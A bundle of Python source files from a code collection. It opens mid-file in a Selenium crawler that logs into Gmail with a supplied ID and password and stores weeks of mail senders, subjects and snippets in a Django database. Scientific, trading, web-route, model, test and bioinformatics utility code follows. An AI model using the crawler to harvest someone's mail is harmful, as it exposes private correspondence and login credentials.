options.add_argument(\"user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) \"\n \"AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\")\n\n url = 'https://accounts.google.com/signin/v2/identifier?flowName=GlifWebSignIn&flowEntry=ServiceLogin'\n path = r\"C:\\Users\\ten\\Desktop\\django_AML\\crawler_AML\\chromedriver.exe\"\n\n driver = webdriver.Chrome(options=options, executable_path=path)\n driver.get(url)\n WebDriverWait(driver, 5).until(EC.presence_of_element_located((By.CSS_SELECTOR, \".CwaK9\")))\n\n driver.find_element_by_id('identifierId').send_keys(user_id)\n driver.find_element_by_css_selector('.CwaK9').click()\n time.sleep(1)\n WebDriverWait(driver, 5).until(EC.presence_of_element_located((By.CSS_SELECTOR, \".CwaK9\")))\n\n try:\n driver.find_element_by_name('password').send_keys(user_pw)\n except Exception as e:\n error = driver.find_element_by_css_selector('.GQ8Pzc').text\n return error,\n\n driver.find_element_by_css_selector('.CwaK9').click()\n\n try:\n WebDriverWait(driver, 5).until(EC.presence_of_element_located((By.CSS_SELECTOR, \".x7WrMb\")))\n except Exception as e:\n error1 = driver.find_element_by_css_selector('.GQ8Pzc').text\n if error1 != '':\n return error1,\n else:\n WebDriverWait(driver, 5).until(EC.presence_of_element_located((By.CSS_SELECTOR, \"#captchaimg\")))\n error2 = driver.find_element_by_css_selector('.T8zd8e').text\n return '보안문제',\n\n start_time_all = time.time()\n\n gmail = gmail_crawler_start(driver, user_id, origin_ph)\n\n print('데이터 기반 크롤링 총 구동 시간 :', time.time() - start_time_all)\n return gmail\n\n\ndef gmail_crawler_start(driver, user, origin_ph):\n # 메일\n driver.get('https://mail.google.com/mail/')\n WebDriverWait(driver, 5).until(EC.presence_of_element_located((By.CSS_SELECTOR, \".aeJ\")))\n\n past_date = datetime.now() - timedelta(weeks=13)\n past_date = past_date.strftime('%Y-%m-%d')\n\n gmail_list = list()\n mail_cnt = 0\n while True:\n html = driver.page_source\n html_soup = BeautifulSoup(html, 'html.parser')\n mail_list = html_soup.select('div.BltHke > div.UI tbody > tr')\n mail_cnt += len(mail_list)\n for i in range(len(mail_list)):\n mail_sender = html_soup.select('div.BltHke > div.UI tbody > tr:nth-of-type('\n + str(i+1) + ') > td.yX > div.yW > span.bA4')[0].text\n mail_sender_email = html_soup.select('div.BltHke > div.UI tbody > tr:nth-of-type('\n + str(i+1) + ') > td.yX > div.yW > span.bA4 > span')[0]['email']\n try:\n mail_title = html_soup.select('div.BltHke > div.UI tbody > tr:nth-of-type('\n + str(i + 1) + ') > td.a4W > div.xS > div.xT > div.y6')[0].text\n except Exception:\n mail_title = html_soup.select('div.BltHke > div.UI tbody > tr:nth-of-type('\n + str(i + 1) + ') > td.a4W > div.a4X > div.xS > div.xT > div.y6')[0].text\n try:\n mail_contents = html_soup.select('div.BltHke > div.UI tbody > tr:nth-of-type('\n + str(i + 1) + ') > td.a4W > div.xS > div.xT > span')[0].text\n except Exception:\n mail_contents = html_soup.select('div.BltHke > div.UI tbody > tr:nth-of-type('\n + str(i + 1) + ') > td.a4W > div.a4X > div.xS > div.xT > span')[0].text\n mail_date = html_soup.select('div.BltHke > div.UI tbody > tr:nth-of-type('\n + str(i + 1) + ') > td.xW > span')[0]['title'].split(' (')[0]\n\n mail_date = mail_date.replace('년 ', '-').replace('월 ', '-').replace(\"일\", '')\n mail_date = datetime.strptime(mail_date, '%Y-%m-%d')\n mail_date = mail_date.strftime('%Y-%m-%d')\n\n mail_dict = dict()\n if mail_sender != '':\n mail_dict['sender'] = mail_sender\n if mail_sender_email != '':\n mail_dict['mail_sender_email'] = mail_sender_email\n if mail_title != '':\n mail_dict['mail_title'] = mail_title\n if mail_contents != '':\n mail_dict['mail_contents'] = mail_contents\n if mail_date != '':\n mail_dict['mail_date'] = mail_date\n gmail_list.append(mail_dict)\n\n # django db insert\n GmailList(\n user_id=user,\n origin_ph=origin_ph,\n gmail_sender=mail_sender,\n gmail_sender_email=mail_sender_email,\n gmail_title=mail_title,\n gmail_contents=mail_contents,\n gmail_date=mail_date\n ).save()\n\n if mail_date > past_date:\n driver.find_element_by_css_selector('span.Di > div.T-I-Js-Gs').click()\n time.sleep(1.5)\n else:\n break\n # django db insert\n print(gmail_list)\n GmailInfo(\n user_id=user,\n origin_ph=origin_ph,\n mail_cnt=mail_cnt\n ).save()\n\n gmail_dict = dict()\n gmail_dict['user'] = user\n gmail_dict['mail_cnt'] = mail_cnt\n\n driver.close()\n\n return gmail_dict, gmail_list\n","sub_path":"django_aml/crawler_AML/crawler/gmail/gmailCrawlerBot_AML.py","file_name":"gmailCrawlerBot_AML.py","file_ext":"py","file_size_in_byte":7233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"236095446","text":"from ase import atoms\nfrom ase.db import connect\nfrom ase.io import write, read\nfrom ase.calculators.eam import EAM\nfrom ase.dft.dos import DOS\n#from gpaw import GPAW\n\ndb = connect('Al-clusters-initial.db')\ncalc = EAM(potential = 'al_potential.alloy')\n\n#calc = EAM('al_potential.alloy')\n#calc = GPAW(\n#mode ='fd',\n#xc = 'LDA',\n#setups = {'Na': '1'},\n#nbands=0,\n#txt='T5.gpaw-out'\n#)\n\nd = ()\ne = ()\nfor cluster in db.select():\n atoms = cluster.toatoms()\n if atoms.get_global_number_of_atoms()<100.0:\n atoms.set_calculator(calc)\n pot_E = atoms.get_potential_energy()\n dos = DOS(calc)\n d = d + (dos.get_dos(),)\n e = e + (dos.get_energies(),)\n","sub_path":"HW5/T5.py","file_name":"T5.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"77383114","text":"from django.urls import path\nfrom django.contrib.auth import views as auth_views\nfrom django.views.generic.base import TemplateView\n\nfrom . import views\n\napp_name = 'schedule'\n\nurlpatterns = [\n\tpath('', views.signup, name='signup'),\n\tpath('login', views.login, name='login'),\n\tpath('logout', auth_views.LogoutView.as_view(), {'next_page': '/login'}, name='logout'),\n\tpath('dashboard', views.dashboard , name='dashboard'),\n\tpath('addSchedule', views.addSchedule, name='addSchedule'),\n\tpath('updateSchedule/', views.updateSchedule, name=\"updateSchedule\"),\n\tpath('deleteSchedule/', views.deleteSchedule, name=\"deleteSchedule\"),\n\tpath('mark//', views.mark, name=\"mark\"),\n\n]\n","sub_path":"todo/schedule/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"85016821","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 20 18:42:56 2020\n\n@author: boo\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 20 17:08:36 2020\n\n@author: boo\n\"\"\"\n\nfrom ibapi.client import EClient\nfrom ibapi.wrapper import EWrapper\nfrom ibapi.contract import Contract\nimport threading\nimport time\n\n\nclass TradingApp(EWrapper, EClient): \n def __init__(self):\n EClient.__init__(self,self) \n EWrapper.__init__(self)\n \n \n \n def historicalData(self, reqId, bar):\n print(\"HistoricalData. ReqId:\", reqId, \"BarData.\", bar)\n \n \ndef websocket_conn():\n app.run()\n \n \n\napp=TradingApp()\napp.connect(\"127.0.0.1\", 7497, clientId=35) \n\n\ncon_thread=threading.Thread(target=websocket_conn, daemon=True)\ncon_thread.start()\ntime.sleep(1)\n\n\ncontract=Contract()\ncontract.symbol=\"TATAMOTOR\"\ncontract.secType = \"STK\"\ncontract.exchange = \"NSE\" \ncontract.currency = \"INR\" \n\n\napp.reqHistoricalData (reqId=35,\n contract=contract,\n endDateTime='20201118 09:00:00',\n durationStr='3 M',\n barSizeSetting='5 mins',\n whatToShow='MIDPOINT',\n useRTH=0,\n formatDate=1,\n keepUpToDate=0,\n chartOptions=[],)\ntime.sleep(5)\n\n","sub_path":"8_historica.py","file_name":"8_historica.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"137345780","text":"import os\nimport unittest\nimport json\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom flaskr import create_app\nfrom models import setup_db, Question, Category\n\n\nclass TriviaTestCase(unittest.TestCase):\n \"\"\"This class represents the trivia test case\"\"\"\n\n def setUp(self):\n \"\"\"Define test variables and initialize app.\"\"\"\n self.app = create_app()\n self.client = self.app.test_client\n self.database_name = \"trivia_test\"\n self.database_path = \"postgres://{}/{}\".format('localhost:5432', self.database_name)\n setup_db(self.app, self.database_path)\n\n # binds the app to the current context\n with self.app.app_context():\n self.db = SQLAlchemy()\n self.db.init_app(self.app)\n # create all tables\n self.db.create_all()\n\n def tearDown(self):\n \"\"\"Executed after reach test\"\"\"\n pass\n\n\n \"\"\"\n TODO\n Write at least one test for each test for successful operation and for expected errors.\n \"\"\"\n\n def test_categories(self):\n res = self.client().get('/categories')\n data = json.loads(new.data)\n self.assertEqual(new.status, 200)\n self.assertEqual(data['SUCCESS'], True)\n self.assertEqual(data['CATEGORIES'])\n\n\n def test_questions(self):\n res = self.client().get('/questions')\n data = json.loads(new.data)\n self.assertEqual(new.status, 200)\n self.assertEqual(data['SUCCESS'], True)\n self.assertEqual(data['CATEGORIES'])\n self.assertEqual(data['QUESTIONS'])\n\n def test_error_questions(self):\n res = self.client().get('/questions?page=10000000')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['SUCCESS'], False)\n self.assertEqual(data['MESSAGE'], 'resource not found')\n\n\n\n def test_delete_question(self):\n id= 2 #id for pass the id to delete the record has same the id\n #code for test DELETE methods that send DELETE reaquset to /example/\n res = self.client().delete('/questions/{}'.format(id))\n data = json.loads(res.data) #featch the delete response\n\n self.assertEqual(res.status_code, 200) #confirm the status response code is 200 is mean Ok\n self.assertEqual(data['SUCCESS'], True)\n self.assertEqual(data['MESSAGE'], \"Question successfully deleted\")\n self.assertTrue(data['DELETE_ID'])\n\n\n\n def test_delete_error(self):\n #code for test DELETE methods that send DELETE reaquset to /example/\n res = self.client().delete('/questions/{}'.format(1))\n data = json.loads(res.data) #fetch the delete response\n\n self.assertEqual(res.status_code, 422) #confirm the status response code is 422 is mean unprocessable\n self.assertEqual(data['SUCCESS'], False)\n self.assertEqual(data['MESSAGE'], \"unprocessable\")\n\n\n\n\n def test_search_in_questions(self):\n data_json={\n 'searchTerm': 'Which is the only team to play in every soccer World Cup tournament?'\n }\n res = self.client().post('/questions/search', json=data_json) #code for test POST methods that send POST reaquset to /example\n data = json.loads(res.data) #fetch the post response\n self.assertEqual(res.status_code, 200) #confirm the status response code is 200 is mean Ok\n self.assertIsNotNone(data['QUESTIONS'])\n\n\n def test_get_questions_on_category(self):\n res = self.client().get('/categories/{}/questions'.format(2)) #code for test GET methods that send Get reaquset to /example\n data = json.loads(res.data) #featch the GET response\n\n self.assertEqual(res.status_code, 200) #confirm the status response code is 200 is mean Ok\n self.assertEqual(data['success'], True)\n self.assertEqual(data['categories'], 'Art')\n self.assertTrue(data['categories'])\n self.assertTrue(data['totalQuestions'])\n self.assertTrue(data['questions'])\n\n\n def test_get_erorr_questions_on_category(self):\n '''\n Test get question on category with data not exit in db\n :pass\n '''\n res = self.client().get('/categories/{}/questions'.format(10)) #code for test GET methods that send Get reaquset to /example\n data = json.loads(res.data) #featch the GET response\n\n self.assertEqual(res.status_code, 404) #confirm the status response code is 404 is mean resource not found\n self.assertEqual(data['success'], False)\n\n\n def test_get_all_quizzes(self):\n '''\n Test play quizzes on all categores with data in db\n :pass\n '''\n data_json={\n \t\"previous_questions\": [3, 4, 10, 12, 11, 5],\n\t \"quiz_category\": {\"type\": \"click\", \"id\": 0}\n }\n res = self.client().post('/quizzes', json=data_json) #code for test POST methods that send POST reaquset to /example\n data = json.loads(res.data) #featch the post response\n self.assertEqual(res.status_code, 200) #confirm the status response code is 200 is mean Ok\n self.assertEqual(data['success'], True)\n self.assertIsNotNone(data['question'])\n self.assertNotEqual(data['question']['id'], 3)\n self.assertNotEqual(data['question']['id'], 12)\n\n\n def test_get_quizzes_in_category(self):\n '''\n Test play quizzes on category with data in db\n :pass\n '''\n data_json={\n \t\"previous_questions\": [3, 4, 10, 12, 11, 5],\n\t \"quiz_category\": {\"type\": \"Art\", \"id\": 2}\n }\n res = self.client().post('/quizzes', json=data_json) #code for test POST methods that send POST reaquset to /example\n data = json.loads(res.data) #featch the post response\n self.assertEqual(res.status_code, 200) #confirm the status response code is 200 is mean Ok\n self.assertEqual(data['success'], True)\n self.assertIsNotNone(data['question'])\n self.assertNotEqual(data['question']['id'], 3)\n self.assertNotEqual(data['question']['id'], 12)\n\n def test_error_quiz_category_not_found_quizzes(self):\n '''\n Test play quizzes on none (no data) category with data in db\n :pass\n '''\n data_json={\n \t\"previous_questions\": [3, 4, 10, 12, 11, 5],\n\t \"quiz_category\": None\n }\n res = self.client().post('/quizzes', json=data_json) #code for test POST methods that send POST reaquset to /example\n data = json.loads(res.data) #featch the post response\n self.assertEqual(res.status_code, 400) #confirm the status response code is 400 is mean bad request\n self.assertEqual(data['success'], False)\n\n# Make the tests conveniently executable\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"projects/02_trivia_api/starter/backend/test_flaskr.py","file_name":"test_flaskr.py","file_ext":"py","file_size_in_byte":7303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"152570200","text":"import torch \nimport torch.nn as nn\nfrom torch.autograd import Variable\nclass MFnn(nn.Module):\n def __init__(self, usr_dim, mov_dim, emb_dim):\n super(MFnn, self).__init__()\n self.emb_u = nn.Embedding(usr_dim, emb_dim)\n self.emb_m = nn.Embedding(mov_dim, emb_dim)\n self.dnn_u = nn.Sequential(\n nn.Linear(emb_dim,128),\n nn.BatchNorm1d(128),\n nn.ReLU(),\n nn.Linear(128,256),\n )\n self.dnn_m = nn.Sequential(\n nn.Linear(emb_dim,128),\n nn.BatchNorm1d(128),\n nn.ReLU(),\n nn.Linear(128,256),\n )\n\n self.b_u = nn.Embedding(usr_dim,1)\n self.b_m = nn.Embedding(mov_dim,1)\n \n self.dropout = nn.Dropout(0.1)\n self.activ = nn.Sigmoid()\n\n def forward(self, users, movies):\n embedded_u = self.dnn_u(self.dropout(self.emb_u(users)))\n embedded_m = self.dnn_m(self.dropout(self.emb_m(movies)))\n bias_u = self.b_u(users)\n bias_m = self.b_m(movies)\n \n out = torch.sum(embedded_m * embedded_u, dim=1).view(-1,1) + bias_u + bias_m\n out = self.activ(out)\n return out\n\n\n\n\n\n\n\n\n","sub_path":"hw5/MF_ench/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"328542731","text":"\"\"\"\nUtility functions for seq2science\n\"\"\"\nimport contextlib\nimport re\nimport os\nimport sys\nimport glob\nimport time\nimport colorsys\nimport pickle\nimport urllib.request\nimport yaml\nfrom io import StringIO\nfrom typing import List\nfrom math import ceil, floor\n\nfrom filelock import FileLock\nimport genomepy\nimport matplotlib.colors as mcolors\nimport numpy as np\nimport pandas as pd\nimport pysradb\nfrom snakemake.exceptions import TerminatedException\nfrom snakemake.logging import logger\n\n# default colors in matplotlib. Order dictates the priority.\nDEFAULT_COLOR_DICTS = [mcolors.BASE_COLORS, mcolors.TABLEAU_COLORS, mcolors.CSS4_COLORS, mcolors.XKCD_COLORS]\n\n\nclass UniqueKeyLoader(yaml.SafeLoader):\n \"\"\"\n YAML loader with duplicate key checking\n source: https://stackoverflow.com/questions/33490870/parsing-yaml-in-python-detect-duplicated-keys\n \"\"\"\n def construct_mapping(self, node, deep=False):\n mapping = []\n for key_node, value_node in node.value:\n key = self.construct_object(key_node, deep=deep).lower()\n if key in mapping:\n logger.error(f\"Duplicate key found in the config.yaml: {key}\\n\")\n raise TerminatedException\n mapping.append(key)\n return super().construct_mapping(node, deep)\n\n\ndef _sample_to_idxs(df: pd.DataFrame, sample: str) -> List[int]:\n \"\"\"\n Get a list of index/indices that belong to a run in a pysradb dataframe\n \"\"\"\n if sample.startswith((\"SRR\", \"DRR\", \"ERR\")):\n idxs = df.index[df.run_accession == sample].tolist()\n assert len(idxs) == 1, f\"sample {sample} with idxs: {idxs}\"\n elif sample.startswith((\"SRX\", \"ERX\", \"DRX\")):\n idxs = df.index[df.experiment_accession == sample].tolist()\n assert len(idxs) >= 1, len(idxs)\n else:\n assert False, f\"sample {sample} not a run, this should not be able to happen!\" \\\n f\" Please make an issue about this!\"\n return idxs\n\n\ndef samples2metadata_local(samples: List[str], config: dict, logger) -> dict:\n \"\"\"\n (try to) get the metadata of local samples\n \"\"\"\n sampledict = dict()\n for sample in samples:\n local_fastqs = glob.glob(os.path.join(config[\"fastq_dir\"], f'{sample}*{config[\"fqsuffix\"]}*.gz'))\n if len(local_fastqs) == 1:\n sampledict[sample] = dict()\n sampledict[sample][\"layout\"] = \"SINGLE\"\n elif len(local_fastqs) == 2 \\\n and any([config[\"fqext1\"] in os.path.basename(f) for f in local_fastqs]) \\\n and any([config[\"fqext2\"] in os.path.basename(f) for f in local_fastqs]):\n sampledict[sample] = dict()\n sampledict[sample][\"layout\"] = \"PAIRED\"\n elif sample.startswith((\"GSM\", \"DRX\", \"ERX\", \"SRX\", \"DRR\", \"ERR\", \"SRR\")):\n continue\n else:\n extend_msg = \"\"\n if len(local_fastqs) > 2:\n extend_msg = (f\"We found too many files matching ({len(local_fastqs)}) \"\n \"and could not distinguish them:\\n\"\n + ', '.join([os.path.basename(f) for f in local_fastqs]) + \".\\n\")\n\n logger.error(f\"\\nsample {sample} was not found..\\n\"\n f\"We checked directory '{config['fastq_dir']}' \"\n f\"for gzipped files starting with '{sample}' and containing '{config['fqsuffix']}'.\\n\"\n + extend_msg +\n f\"Since the sample did not start with either GSM, SRX, SRR, ERR, and DRR we \"\n f\"couldn't find it online..\\n\")\n raise TerminatedException\n\n return sampledict\n\n\ndef samples2metadata_sra(samples: List[str], logger) -> dict:\n \"\"\"\n Get the required info to continue a seq2science run from a list of samples.\n\n - If a sample already exists locally, we only want to know if it is paired-end or single-end.\n - If a sample does not exist locally\n - find its corresponding SRX number and all runs that belong to it,\n - check if they all have the same layout, if not, crash\n - see if we can download the runs from ena\n\n output:\n dict(\n \"GSM1234\": {\"layout\": \"PAIRED\",\n \"runs\": [\"SRR1234\", \"SRR4321\"],\n \"ena_fastq_ftp\": {...},\n\n \"SRR5678\": {\"layout\": \"SINGLE\",\n \"runs\": [\"SRR5678\"],\n ena_fastq_ftp: None,\n ...\n )\n \"\"\"\n # start with empty dictionary which we fill out later\n sampledict = {sample: dict() for sample in samples}\n\n # only continue with public samples\n db_sra = pysradb.SRAweb()\n\n # all samples that are on GEO (GSM numbers), must first be converted to SRA ids (SRX numbers)\n geo_samples = [sample for sample in samples if sample.startswith(\"GSM\")]\n\n # in sample2clean we store the (potential GEO) sample name in a SRA compliant name\n if len(geo_samples):\n try:\n df_geo = db_sra.gsm_to_srx(geo_samples)\n except:\n logger.error(\"We had trouble querying the SRA. This probably means that the SRA was unresponsive, and their servers \"\n \"are overloaded or slow. Please try again in a bit...\\n\"\n \"Another possible option is that you try to access samples that do not exist or are protected, and \"\n \"seq2science does not support downloading those..\\n\\n\")\n raise TerminatedException\n\n sample2clean = dict(zip(df_geo.experiment_alias, df_geo.experiment_accession))\n else:\n sample2clean = dict()\n\n # now add the already SRA compliant names with a reference to itself\n sample2clean.update({sample: sample for sample in samples if sample not in geo_samples})\n\n # check our samples on sra\n try:\n df_sra = db_sra.sra_metadata(list(sample2clean.values()), detailed=True)\n except:\n logger.error(\"We had trouble querying the SRA. This probably means that the SRA was unresponsive, and their servers \"\n \"are overloaded or slow. Please try again in a bit...\\n\"\n \"Another possible option is that you try to access samples that do not exist or are protected, and \"\n \"seq2science does not support downloading those..\\n\\n\")\n raise TerminatedException\n\n # keep track of not-supported samples\n not_supported_formats = [\"ABI_SOLID\"]\n not_supported_samples = []\n\n for sample, clean in sample2clean.items():\n # table indices\n idxs = _sample_to_idxs(df_sra, clean)\n\n # get all runs that belong to the sample\n runs = df_sra.loc[idxs].run_accession.tolist()\n assert len(runs) >= 1\n sampledict[sample][\"runs\"] = runs\n\n # check if sample is from a supported format\n for bad_format in not_supported_formats:\n for real_format in df_sra.loc[idxs].instrument_model_desc.tolist():\n if real_format == bad_format:\n not_supported_samples.append(sample)\n\n # get the layout\n layout = df_sra.loc[idxs].library_layout.tolist()\n assert len(set(layout)) == 1, f\"sample {sample} consists of mixed layouts, bad!\"\n assert layout[0] in [\"PAIRED\", \"SINGLE\"], f\"sample {sample} is an unclear layout, bad!\"\n sampledict[sample][\"layout\"] = layout[0]\n\n # get the ena url\n sampledict[sample][\"ena_fastq_ftp\"] = dict()\n for run in runs:\n if layout[0] == \"SINGLE\":\n sampledict[sample][\"ena_fastq_ftp\"][run] = df_sra[df_sra.run_accession == run].ena_fastq_ftp.tolist()\n elif layout[0] == \"PAIRED\":\n sampledict[sample][\"ena_fastq_ftp\"][run] = df_sra[df_sra.run_accession == run].ena_fastq_ftp_1.tolist() + df_sra[\n df_sra.run_accession == run].ena_fastq_ftp_2.tolist()\n\n # if any run from a sample is not found on ENA, better be safe, and assume that sample as a whole is not on ENA\n if any([any(pd.isna(urls)) for urls in sampledict[sample][\"ena_fastq_ftp\"].values()]):\n sampledict[sample][\"ena_fastq_ftp\"] = None\n\n # now report single message for all sample(s) that are from a sequencing platform that is not supported\n assert len(not_supported_samples) == 0, \\\n f'Sample(s) {\", \".join(not_supported_samples)} are not supported by seq2science. Samples that are one of ' \\\n f'these formats; [{\", \".join(not_supported_formats)}] are not supported.'\n\n\n return sampledict\n\n\ndef samples2metadata(samples: List[str], config: dict, logger) -> dict:\n local_samples = samples2metadata_local(samples, config, logger)\n public_samples = [sample for sample in samples if sample not in local_samples.keys()]\n\n if len(public_samples) == 0:\n return local_samples\n\n # chop public samples into smaller chunks, doing large queries results into\n # pysradb decode errors..\n chunksize = 100\n chunked_public = [public_samples[i:i+chunksize] for i in range(0, len(public_samples), chunksize)]\n sra_samples = dict()\n for chunk in chunked_public:\n sra_samples.update(samples2metadata_sra(chunk, logger))\n # just to be sure sleep in between to not go over our API limit\n time.sleep(1)\n\n return {**local_samples, **sra_samples}\n\n\ndef sieve_bam(configdict):\n \"\"\"\n helper function to check whether or not we use rule sieve_bam\n \"\"\"\n return (\n configdict.get(\"min_mapping_quality\", 0) > 0\n or configdict.get(\"tn5_shift\", False)\n or configdict.get(\"remove_blacklist\", False)\n or configdict.get(\"filter_on_size\", False)\n or configdict.get(\"remove_mito\", False)\n )\n\n\ndef parse_contrast(contrast, samples, check=True):\n \"\"\"\n Extract contrast batch and column, target and reference groups from a DE contrast design.\n Check for contrast validity if check = True.\n\n If \"all\" is in the contrast groups, it is always assumed to be the target\n (and expanded to mean all groups in the column in function `get_contrasts()`).\n\n Accepts a string containing a DESeq2 contrast design.\n\n Returns\n batch: the batch column, or None\n column: the contrast column\n target: the group of interest\n reference: the control group\n \"\"\"\n # clean contrast\n de_contrast = contrast.strip().replace(\" \", \"\").replace(\"~\", \"\")\n\n # parse batch effect\n batch = None\n if \"+\" in de_contrast:\n batch, de_contrast = de_contrast.split(\"+\")\n if len(de_contrast) > 1:\n ValueError(f\"DE contrast {contrast} can only contain a '+' to denote the batch effect column.\")\n\n # parse groups\n target, reference = de_contrast.split(\"_\")[-2:]\n\n # parse column\n n = de_contrast.find(f\"_{target}_{reference}\")\n column = de_contrast[:n]\n\n # \"all\" is never the reference\n if reference == \"all\":\n reference = target\n target = \"all\"\n\n if check:\n # check if columns exists and are valid\n valid_columns = [col for col in samples.columns if col not in [\"sample\", \"assembly\"]]\n # columns that may have been dropped, if so, these backups have been saved\n backup_columns = {\"technical_replicates\": \"_trep\", \"biological_replicates\": \"_brep\", \"descriptive_name\": \"_dname\"}\n for col in [batch, column]:\n if col:\n assert col in valid_columns + list(backup_columns.keys()), (\n f'\\nIn DESeq2 contrast design \"{contrast}\", '\n f'column \"{col}\" does not match any valid column name.\\n'\n )\n # check if group is element of column\n c = column if column in samples else backup_columns[column] # column/backup column\n all_groups = set(samples[c].dropna().astype(str))\n for group in [target, reference]:\n if group != \"all\":\n assert group in all_groups, (\n f'\\nIn DESeq2 contrast design \"{contrast}\", '\n f'group {group} cannot be found in column {column}.\\n'\n )\n\n return batch, column, target, reference\n\n\ndef expand_contrasts(samples, config):\n \"\"\"\n splits contrasts that contain multiple comparisons\n \"\"\"\n old_contrasts = config.get(\"contrasts\", [])\n if isinstance(old_contrasts, str):\n old_contrasts = [old_contrasts]\n\n new_contrasts = []\n for contrast in old_contrasts:\n batch, column, target, reference = parse_contrast(contrast, samples, check=False)\n\n if target == \"all\":\n # all vs 1 comparison (\"all vs A\")\n targets = set(samples[column].dropna().astype(str))\n targets.remove(reference)\n else:\n # 1 vs 1 comparison (\"A vs B\")\n targets = [target]\n\n for target in targets:\n new_contrast = f\"{column}_{target}_{reference}\"\n if batch:\n new_contrast = f\"{batch}+{new_contrast}\"\n new_contrasts.append(new_contrast)\n\n # get unique elements\n new_contrasts = list(set(new_contrasts))\n return new_contrasts\n\n\ndef url_is_alive(url):\n \"\"\"\n Checks that a given URL is reachable.\n https://gist.github.com/dehowell/884204\n \"\"\"\n for i in range(3):\n try:\n request = urllib.request.Request(url)\n request.get_method = lambda: 'HEAD'\n\n urllib.request.urlopen(request, timeout=5)\n return True\n except:\n continue\n return False\n\n \ndef get_bustools_rid(params):\n \"\"\"\n Extract the position of the fastq containig reads from the bustools -x argument.\n The read_id is the first pos of the last triplet in the bc:umi:read string or hard-coded\n for short-hand syntax.\n In: -x 10xv3 -> read_id=1 \n In: -x 0,0,16:0,16,26:1,0,0 -> read_id=1\n \"\"\"\n kb_tech_dict = {'10xv2': 1, '10xv3': 1, 'celseq': 1, 'celseq2': 1,\n 'dropseq': 1, 'scrubseq': 1, 'indropsv1': 1, 'indropsv2': 0 } \n #Check for occurence of short-hand tech\n bus_regex = \"(? tuple:\n \"\"\"\n convert a string with RGB/matplotlib named colors to matplotlib HSV tuples.\n\n supports RGB colors with ranges between 0-1 or 0-255.\n\n supported matplotlib colors can be found here:\n https://matplotlib.org/3.3.1/gallery/color/named_colors.html\n \"\"\"\n # input: RGB\n if color.count(\",\") == 2:\n value = [float(c) for c in color.split(\",\")]\n return rgb_to_hsv(value)\n\n # input: matplotlib colors\n cdicts = color_dicts if color_dicts else DEFAULT_COLOR_DICTS\n for cdict in cdicts:\n if color in cdict:\n value = cdict[color]\n\n # tableau, css4 and xkcd return hex colors.\n if str(value).startswith(\"#\"):\n value = hex_to_rgb(value)\n\n return rgb_to_hsv(value)\n\n logger.error(f\"Color not recognized: {color}\")\n raise ValueError\n\n\ndef color_picker(n, min_h=0, max_h=0.85, s=1.00, v=0.75, alternate=True):\n \"\"\"\n Return a list of n tuples with HSV colors varying only in hue.\n \"Alternate\" determines whether hues transition gradually or discretely.\n \"\"\"\n # for fewer samples, select nearby colors\n steps = max(n, 8)\n\n hues = np.linspace(min_h, max_h, steps).tolist()[0:n]\n if alternate:\n m = ceil(len(hues)/2)\n h1 = hues[:m]\n h2 = hues[m:]\n hues[::2] = h1\n hues[1::2] = h2\n\n hsv_colors_list = [(h, s, v) for h in hues]\n return hsv_colors_list\n\n\ndef color_gradient(hsv: tuple, n: int) -> List[tuple]:\n \"\"\"\n Based on the input HSV color,\n return a list of n tuples with HSV colors\n of increasing brightness (saturation + value).\n \"\"\"\n # for fewer samples, select nearby colors\n steps = max(n, 4)\n\n h = hsv[0]\n s = np.linspace(hsv[1], 0.2, steps) # goes down\n v = np.linspace(hsv[2], 1.0, steps) # goes up\n\n hsv_gradient_list = [(h, s[i], v[i]) for i in range(n)]\n return hsv_gradient_list\n\n\ndef unique(sequence):\n seen = set()\n return [x for x in sequence if not (x in seen or seen.add(x))]\n\n\ndef shorten(string, max_length, methods=\"right\"):\n \"\"\"\n shorten a string to a max_length, multiple methods accepted.\n \"signs\" and \"vowels\" remove their respective characters from right to left.\n \"left\",\"right\" and \"center\" can be performed afterward if the desired length is not yet reached.\n \"\"\"\n overhead = len(string) - max_length\n if overhead <= 0:\n return string\n\n if \"signs\" in methods:\n signs = [\"-\", \"_\", \".\"]\n s = \"\"\n for l in string[::-1]:\n if l in signs and overhead > 0:\n overhead -= 1\n else:\n s += l\n string = s[::-1]\n\n if \"vowels\" in methods:\n vowels = [\"a\", \"e\", \"i\", \"o\", \"u\"]\n s = \"\"\n for l in string[::-1]:\n if l in vowels and overhead > 0:\n overhead -= 1\n else:\n s += l\n string = s[::-1]\n\n if \"right\" in methods:\n string = string[:max_length]\n elif \"left\" in methods:\n string = string[len(string)-max_length:]\n elif \"center\" in methods:\n string = string[:ceil(max_length/2)] + string[len(string)-floor(max_length/2):]\n\n return string\n\n\nclass CaptureStdout(list):\n \"\"\"\n Context manager that somehow manages to capture prints,\n and not snakemake log\n \"\"\"\n def __enter__(self):\n self._stdout = sys.stdout\n sys.stdout = self._stringio = StringIO()\n return self\n\n def __exit__(self, *args):\n self.extend(self._stringio.getvalue().splitlines())\n del self._stringio # free up some memory\n sys.stdout = self._stdout\n\n\nclass CaptureStderr(list):\n \"\"\"\n Context manager that somehow manages to capture prints,\n and not snakemake log\n \"\"\"\n def __enter__(self):\n self._stderr = sys.stderr\n sys.stderr = self._stringio = StringIO()\n return self\n\n def __exit__(self, *args):\n self.extend(self._stringio.getvalue().splitlines())\n del self._stringio # free up some memory\n sys.stderr = 